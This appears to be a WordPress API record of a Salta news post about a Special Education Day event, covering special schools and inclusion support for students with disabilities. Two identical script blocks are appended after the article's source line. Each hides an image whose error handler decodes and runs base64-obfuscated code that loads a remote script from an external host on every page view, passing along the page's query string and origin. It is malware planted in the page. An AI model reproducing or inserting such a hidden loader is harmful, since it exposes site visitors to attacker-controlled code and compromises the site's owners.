{"id":1272,"date":"2022-08-10T13:40:01","date_gmt":"2022-08-10T16:40:01","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1272"},"modified":"2025-08-14T00:38:55","modified_gmt":"2025-08-14T03:38:55","slug":"conmemoraron-el-dia-de-la-educacion-especial-en-el-centro-cultural-america","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1272","title":{"rendered":"Conmemoraron el D\u00eda de la Educaci\u00f3n Especial en el Centro Cultural Am\u00e9rica"},"content":{"rendered":"\n<h3 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\">Participaron representantes de las 31 escuelas especiales y los 3 centros educativos integrales que dan apoyo a la inclusi\u00f3n al nivel secundario a personas con discapacidad.<\/h3>\n\n\n\n<p>En el marco del D\u00eda de la Educaci\u00f3n Especial el Ministerio de Educaci\u00f3n realiz\u00f3 un encuentro para intercambiar buenas pr\u00e1cticas y &nbsp;difundir los servicios que esta modalidad brinda a la comunidad. Adem\u00e1s hubo exposiciones en stands de dichas instituciones, representadas por modalidades dedicadas a discapacidades visuales, auditivas e intelectuales.<\/p>\n\n\n\n<p>El ministro de Educaci\u00f3n,<strong>&nbsp;Mat\u00edas C\u00e1nepa&nbsp;<\/strong>particip\u00f3 del cierre de la actividad y manifest\u00f3, entre otras cosas, la importancia de articular el esfuerzo entre Provincia y Municipios y entre las distintas \u00e1reas del Estado para brindar una mejor atenci\u00f3n en las instituciones educativas.<\/p>\n\n\n\n<p>Adem\u00e1s el funcionario destac\u00f3 el trabajo que vienen realizando docentes y directivos de la modalidad e indic\u00f3 que una muestra de ello es la escuela Corina Lona que pronto cumplir\u00e1 92 a\u00f1os en el abordaje de la discapacidad visual.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3702-conmemoraron-el-dia-de-la-educacion-especial-en-el-centro-cultural-america.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3702-conmemoraron-el-dia-de-la-educacion-especial-en-el-centro-cultural-america.jpg\" alt=\"Conmemoraron el D\u00eda de la Educaci\u00f3n Especial en el Centro Cultural Am\u00e9rica\"\/><\/a><\/figure>\n\n\n\n<p>Son casi 13 mil los estudiantes con discapacidad motora, auditiva, visual, intelectual y con condici\u00f3n TEA de toda la provincia los que participaron en los trabajos de apoyo a la inclusi\u00f3n dentro de las escuelas regulares.<\/p>\n\n\n\n<p>Actualmente la coordinaci\u00f3n de Educaci\u00f3n Especial trabaja de manera intensa con docentes y directivos de escuelas comunes, brindando capacitaciones situacionales y territoriales con grupos interdisciplinarios, tanto en primaria como en secundaria, para acompa\u00f1ar las trayectorias educativas con el objetivo de promover los procesos de inclusi\u00f3n de personas con discapacidad en las escuelas comunes.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/conmemoraron-el-dia-de-la-educacion-especial-en-el-centro-cultural-america-84155\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Participaron representantes de las 31 escuelas especiales y los 3 centros educativos integrales que dan apoyo a la inclusi\u00f3n al nivel secundario a personas con discapacidad. En el marco del D\u00eda de la Educaci\u00f3n Especial el Ministerio de Educaci\u00f3n realiz\u00f3 un encuentro para intercambiar buenas pr\u00e1cticas y &nbsp;difundir los servicios que esta modalidad brinda a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1273,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,17],"tags":[],"class_list":{"0":"post-1272","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1272"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1272"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1272\/revisions"}],"predecessor-version":[{"id":7400,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1272\/revisions\/7400"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1273"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1272"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1272"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1272"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}